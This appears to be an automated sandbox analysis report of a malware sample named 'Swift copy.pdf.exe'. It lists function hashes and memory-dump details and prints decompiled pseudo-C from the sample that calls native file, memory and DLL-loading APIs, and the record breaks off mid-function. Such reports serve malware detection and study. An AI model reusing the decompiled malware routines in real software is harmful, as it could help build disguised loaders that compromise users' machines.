                                                                  • Instruction Fuzzy Hash: D51103B58003489FCB10DF9AC485BDEBBF8FB48324F14841AE414A7600C374A944CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?), ref: 00D0DF1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: d3072074fa351f7e4d3a137b3824850c416682950d7ac1340009b0791e275477
                                                                  • Instruction ID: fa2053b9c9588c0b3cbc40d71a1e1ec9d7f74410268a086e177abdd34ced44c1
                                                                  • Opcode Fuzzy Hash: d3072074fa351f7e4d3a137b3824850c416682950d7ac1340009b0791e275477
                                                                  • Instruction Fuzzy Hash: 6F1103B58002498FDB10CF99D485BDEBBF8EF48324F14841AE919A7740C374A944CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0DEBF, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?), ref: 00D0DF1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: 6b1b5dc2779f379095660ccd0902fd9b86caa2f44b0eb3fc35b080866bc6b628
                                                                  • Instruction ID: c3da2e7fb601a905090355a5c90bdde86e9c5a93eef29841a8146c77ba658266
                                                                  • Opcode Fuzzy Hash: 6b1b5dc2779f379095660ccd0902fd9b86caa2f44b0eb3fc35b080866bc6b628
                                                                  • Instruction Fuzzy Hash: 6D1115B58002498FDB10CF99D485BDEBBF8EF48324F14841AE919A7740C374A945CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 06D28278, Relevance: 5.2, Strings: 4, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ^_~:$eln$eln$eln
                                                                  • API String ID: 0-2503117912
                                                                  • Opcode ID: 363b412e42c573215839dcfa9103e7878152b83d7305a5755fab72933b9c2878
                                                                  • Instruction ID: 47fba7ae109a41359e53074cd840660f818b4da26e16a8b7ad1f2a784e80d25c
                                                                  • Opcode Fuzzy Hash: 363b412e42c573215839dcfa9103e7878152b83d7305a5755fab72933b9c2878
                                                                  • Instruction Fuzzy Hash: FB9133B0E0521ACFCB44CFA9D8816EEFBB2FF99304F14856AC415A7204D7349A59CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D25620, Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /|6$/|6
                                                                  • API String ID: 0-2758206559
                                                                  • Opcode ID: f75dd98382c3ad610c8dad33f1ac86a9927e532af0b742c7a763acc56281592b
                                                                  • Instruction ID: 402f4ffba62d3af6383d71221beb3d4ee2807bc2e2c7b6517b776b57f34a2227
                                                                  • Opcode Fuzzy Hash: f75dd98382c3ad610c8dad33f1ac86a9927e532af0b742c7a763acc56281592b
                                                                  • Instruction Fuzzy Hash: 7B612374E1121ADFDB44CF99E5809AEFBB2FF99311F14852AD505AB314D334AA82CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02583890, Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: hcQn
                                                                  • API String ID: 0-2632799683
                                                                  • Opcode ID: a53db4685c11123f7e772e3be54923db4ae3dfd2adc397945d7f1fc4725ed937
                                                                  • Instruction ID: 742e99e80074d71e11b1dcb717a6dab136c881d42dbf2a817d3fe75a86d508b5
                                                                  • Opcode Fuzzy Hash: a53db4685c11123f7e772e3be54923db4ae3dfd2adc397945d7f1fc4725ed937
                                                                  • Instruction Fuzzy Hash: 3FA134B4E0520ADFCB44DFAAD4814AEFBB2FF89310F20946AD405BB254D7749A02CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D0C2B0, Relevance: .5, Instructions: 522COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60e8153654f1d0f0bd709e69ecb2aefdc51f8f9a7fa1f6429df9ae1a52aee4a9
                                                                  • Instruction ID: 4311584c75ed8fbe3d4a8d797354c69e7958766e6655d33839fda4c77c9853d0
                                                                  • Opcode Fuzzy Hash: 60e8153654f1d0f0bd709e69ecb2aefdc51f8f9a7fa1f6429df9ae1a52aee4a9
                                                                  • Instruction Fuzzy Hash: C75259B19907068FD710CF14E88C2997FB1FB40318BD4CB09D1A56BAD0D3B5A56AEF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02586E48, Relevance: .4, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a063fd296c63081d5f2264807b1c4c68ccdb556dc3e7fb5a925b94610e5c8ab0
                                                                  • Instruction ID: 1f428a3b0f715afa22214bf3dfa4d3f17495b79f7b87a67bab00ed0ce1648311
                                                                  • Opcode Fuzzy Hash: a063fd296c63081d5f2264807b1c4c68ccdb556dc3e7fb5a925b94610e5c8ab0
                                                                  • Instruction Fuzzy Hash: CDE1DE707006048FDB29EB75C4607AABBEABF88304F24846DE14ADB796DF75D801CB65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00D09968, Relevance: .3, Instructions: 265COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.350899486.0000000000D00000.00000040.00000001.sdmp, Offset: 00D00000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95e693d4f97c975f7d5ab0edb34dd9d7699b6e807a8ed3330ee06ca3960bf63d
                                                                  • Instruction ID: 87ee2eb236b2401e6653b87dda9047d6c5617a75dd7e88094d4ed4628c780bd3
                                                                  • Opcode Fuzzy Hash: 95e693d4f97c975f7d5ab0edb34dd9d7699b6e807a8ed3330ee06ca3960bf63d
                                                                  • Instruction Fuzzy Hash: 8CA17F32E0061A8FCF05DFB5C84469DBBB2FF85304B15856AE909BB261EB31E915CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D28470, Relevance: .2, Instructions: 162COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11cbb9d1e34ad6dfae62ec73780dd5318b343c3fa3de832e2cc96eabbac192bb
                                                                  • Instruction ID: 76019f5c9a95cddda3827e8c2915b55cf23cf5d090a3e5ddb02f7ee05bfff3d1
                                                                  • Opcode Fuzzy Hash: 11cbb9d1e34ad6dfae62ec73780dd5318b343c3fa3de832e2cc96eabbac192bb
                                                                  • Instruction Fuzzy Hash: 697103B4E0022ADFCB44CF99C5808AEFBB2FF98314F14955AD515A7314D334A986DFA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D28460, Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 281a13d80ed3a74aa5b58488f7e7127b2212ef4ec17ac2ac3b15f0b637dd43bf
                                                                  • Instruction ID: a3c5176a81583492d9b78aedb76cceead4c7f676fb1dc94bb59042bf596151d0
                                                                  • Opcode Fuzzy Hash: 281a13d80ed3a74aa5b58488f7e7127b2212ef4ec17ac2ac3b15f0b637dd43bf
                                                                  • Instruction Fuzzy Hash: E36103B0E0022ACFCB44CF99D4809AEFBB2FF98314F14855AD519A7315D334A986DFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D25613, Relevance: .2, Instructions: 160COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 518473a4fef2b4084a29d55d3508d41eb5bad120b2a76c91dc92c8ee65842172
                                                                  • Instruction ID: 07f1a2ff69556ad354610615e7b5e1b0be82d7eb7e5e685c4c9b5011b56172b6
                                                                  • Opcode Fuzzy Hash: 518473a4fef2b4084a29d55d3508d41eb5bad120b2a76c91dc92c8ee65842172
                                                                  • Instruction Fuzzy Hash: 03613674E1121ADFDB44CF99E5809AEFBB2FF98315F14852AD505A7324D334AA82CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02583619, Relevance: .2, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 31ccf02e4cda4638af951366781b088abb2e39358b6a6d4617462cea1ef24dae
                                                                  • Instruction ID: 7731503f9f0b81dc9e0b1ff9c2006f73fa30237edef7436bf31c6ecbefb7f332
                                                                  • Opcode Fuzzy Hash: 31ccf02e4cda4638af951366781b088abb2e39358b6a6d4617462cea1ef24dae
                                                                  • Instruction Fuzzy Hash: B5513E225892C69FC7065BB4647A6D6BFF0EE4A63076F85DBC484CA423D29C868AC744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02580F80, Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f582d9b133545deefb4d2407c47528350fc444431adfaf8f56e56b2a3a5abaff
                                                                  • Instruction ID: 71a26fded1ef7869d4e40612298a899a5010b40f9b2fcd90c54ee340a0232867
                                                                  • Opcode Fuzzy Hash: f582d9b133545deefb4d2407c47528350fc444431adfaf8f56e56b2a3a5abaff
                                                                  • Instruction Fuzzy Hash: FA316970E11659CBDB18CFAAD9806AEFBF2BBC8200F14D46AD408F7254DB744A01CF15
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02580F6F, Relevance: .1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d4982d6d06a6a0acfa98cb5dc0fde8455bd8b46f8bfd6cf3408ba36519c3953
                                                                  • Instruction ID: 87556f0d718121e3329fbbf943cf025a83303817a67be29aa07b01206cab36e3
                                                                  • Opcode Fuzzy Hash: 3d4982d6d06a6a0acfa98cb5dc0fde8455bd8b46f8bfd6cf3408ba36519c3953
                                                                  • Instruction Fuzzy Hash: 1231AB70E05659CBDB18CFAAD9806AEFBF2BFC8200F14D46AD408F7254DB708A01CB55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D29120, Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b23ef8952e8383e840e616ec63925dbeca7a5f8e74f567d467c68abf2d7bd79
                                                                  • Instruction ID: 113670f92d305fdcc76c89001098ed6645a769f9bb1c62f68f763c245de156f2
                                                                  • Opcode Fuzzy Hash: 8b23ef8952e8383e840e616ec63925dbeca7a5f8e74f567d467c68abf2d7bd79
                                                                  • Instruction Fuzzy Hash: 9C21EB71E046289BEB58CFABD8506DEFBF7EFC8204F04C0BAD508A6254EB305A458F51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D29113, Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f5e192d7057528f63a3886f246db18991f18e1a4eb8c5d68344beccbf92bc6e
                                                                  • Instruction ID: d2f18963883b478891d05d742aaedf51f1344382681abb2b16b1d25ccdd44752
                                                                  • Opcode Fuzzy Hash: 2f5e192d7057528f63a3886f246db18991f18e1a4eb8c5d68344beccbf92bc6e
                                                                  • Instruction Fuzzy Hash: AA210E71E056188FEB19CF6BD85069EFBF3AFC9200F04C0BAC508A7254DB344A458F51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02587338, Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c570d9e16a5373cd21825869b4450d6c4cc042752cc9d81aa0f300dfd3a585d
                                                                  • Instruction ID: 604e4ac4031f4aa749a183ff12c203aa254d35d581ad31085b763a489ab0c1c3
                                                                  • Opcode Fuzzy Hash: 5c570d9e16a5373cd21825869b4450d6c4cc042752cc9d81aa0f300dfd3a585d
                                                                  • Instruction Fuzzy Hash: D8112734D552198BDB14EFA5C858BEEFBF1BB4E305F24946AD401B3290CBB88944CB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02587337, Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb0b26212171e94adf0fb74563d5fee601f2320188fbf5e56e9b6c046d766c6c
                                                                  • Instruction ID: bfb8f6145db3da2c189770170bc015ad9174b372f036496971a544f18f9db209
                                                                  • Opcode Fuzzy Hash: cb0b26212171e94adf0fb74563d5fee601f2320188fbf5e56e9b6c046d766c6c
                                                                  • Instruction Fuzzy Hash: 2E117930D452198BDB04AFA4C408BEEFBF0BB4E304F249469D401B7290CBB48A44CB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Analysis Process: Swift copy.pdf.exe PID: 6904 Parent PID: 6628 Swift copy.pdf.exeCOMMON

                                                                  Executed Functions

                                                                  Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                  0x00418263
                                                                  0x0041826f
                                                                  0x00418277
                                                                  0x00418282
                                                                  0x0041829d
                                                                  0x004182a5
                                                                  0x004182a9

                                                                  APIs
                                                                  • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID: B=A$B=A
                                                                  • API String ID: 2738559852-2767357659
                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                  • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                  • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                  0x00409b2c
                                                                  0x00409b2f
                                                                  0x00409b34
                                                                  0x00409b39
                                                                  0x00409b43
                                                                  0x00409b48
                                                                  0x00409b4b
                                                                  0x00409b4d
                                                                  0x00409b55
                                                                  0x00409b5a
                                                                  0x00409b5a
                                                                  0x00409b61
                                                                  0x00409b69
                                                                  0x00409b6c
                                                                  0x00409b6e
                                                                  0x00409b82
                                                                  0x00000000
                                                                  0x00409b84
                                                                  0x00409b8a
                                                                  0x00409b3e
                                                                  0x00409b3e
                                                                  0x00409b3e

                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E004181AA(signed int __edx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				asm("std");
				asm("cmc");
				 *(__edi - 0x74aaa444) =  *(__edi - 0x74aaa444) & __edx;
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E00418DB0(__edi, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}




                                                                  0x004181aa
                                                                  0x004181ab
                                                                  0x004181ac
                                                                  0x004181b3
                                                                  0x004181bf
                                                                  0x004181c7
                                                                  0x004181fd
                                                                  0x00418201

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 02830b03877a9af6396ee7d4df77487a6090a61d4e2e898cd12e3edfe527b43d
                                                                  • Instruction ID: 3972013a753a12d26e96b89c3d2ad04590ec479f2aa4540722dc2ede5d30f7fb
                                                                  • Opcode Fuzzy Hash: 02830b03877a9af6396ee7d4df77487a6090a61d4e2e898cd12e3edfe527b43d
                                                                  • Instruction Fuzzy Hash: D501B2B2205108AFCB48CF99DC95EEB77A9AF8C354F15824CFA4DD7241C630E851CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                  0x004181bf
                                                                  0x004181c7
                                                                  0x004181fd
                                                                  0x00418201

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                  • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                  • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                  0x0041839f
                                                                  0x004183a7
                                                                  0x004183c9
                                                                  0x004183cd

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                  • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                  • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                  0x004182e3
                                                                  0x004182e6
                                                                  0x004182ef
                                                                  0x004182f7
                                                                  0x00418305
                                                                  0x00418309

                                                                  APIs
                                                                  • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                  • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                  • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E004088A0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
